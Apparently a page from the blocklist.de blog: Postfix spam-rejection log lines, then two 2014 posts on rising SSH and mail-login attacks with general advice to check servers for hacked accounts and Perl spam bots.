Mar 20 07:08:07 smtp-mx postfix/smtpd[15898]: NOQUEUE: reject: RCPT from unknown[201.73.148.20]: 550 5.7.1 <postmaster@blocklist.de>: Recipient address rejected: Please see http://www.openspf.org/Why?s=mfrom;id=dafiti%40gvgvv.com.br;ip=201.73.148.20;r=smtp-mx.blocklist.de; from=<dafiti@gvgvv.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<jmendes.com.br>

Mar 20 07:08:10 smtp-mx postfix/smtpd[15561]: NOQUEUE: reject: RCPT from unknown[201.30.165.34]: 554 5.7.1 Service unavailable; Client host [201.30.165.34] blocked using sbl-xbl.spamhaus.org; http://www.spamhaus.org/query/bl?ip=201.30.165.34; from=<bounce-30644-12669464-5960-248@bangmax.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<embrasil.com.br>

Mar 20 07:08:58 smtp-mx postfix/cleanup[15929]: 976F8D5943F85: reject: header Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain> from unknown[186.215.253.93]; from=<bounce-2696-19326188-4124-248@hiperlux.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<irmadulce.org.br>: 5.7.1 NOQUEUE: reject: This Message is not allowed here

-google-ads-
2014
02.25

On the last Blog-Post:

https://blog.blocklist.de/2014/01/30/ssh-attacks-increased-since-new-year/

we wrote about the increased Attacks of SSH-Logins.

Now, since round about one week, the Attacks of Mail (sasl-, imap-, pop3-, smtp-Logins and relaying/blocking IPs) are increased:

mail-relay-sasl-week

 

 

 

 

 

 

The count of hacked Accounts and hacked Sites with spam-Script is also going up. Lot of answers like this:

The server was hacked and an e-mail perl script was running on it. Normally there is no mail service on this server.
We are sorry about this.

 

A lot of Answers comes from arvixe.com which have received only repors for „mail“. Since 20.02.2014 we received 91 Answers. From 30.05.2013 until 03.11.2013 we received only 13 and there was not „mail“-Attack. Only reg-/Badbots (Forum-Spam).

On my employer, the count of hacked accounts is going up on 3/4 more then normally (normally are 1/4).

If you received that your IP are on a Mail-Blocklist like spamcop.net or you get an blocklist.de-Report, please check your Server for hacked E-Mailaccounts and running Perl-Bots.

-google-ads-
2014
01.30

Since new Year, the SSH-Attacks are increased.
Normally my 6 Servers has each Day 25-50 SSH-Attacks.

But the first Week, the Attacks going up to now min. 150 SSH-Attacks each Day:

ssh-anstieg

 

 

 

 

 

Other Poeple which does not block the IPs from the SSH-List (Export) seen the same increase too.

In hackforums . NET, other People say, he hacks over 1.000 Server over SSH and was not disabled by server4you for attacking other Servers. But when it right what he say, there is a lot of hacked Server online :-(

Please check and secure your Servers!

-google-ads-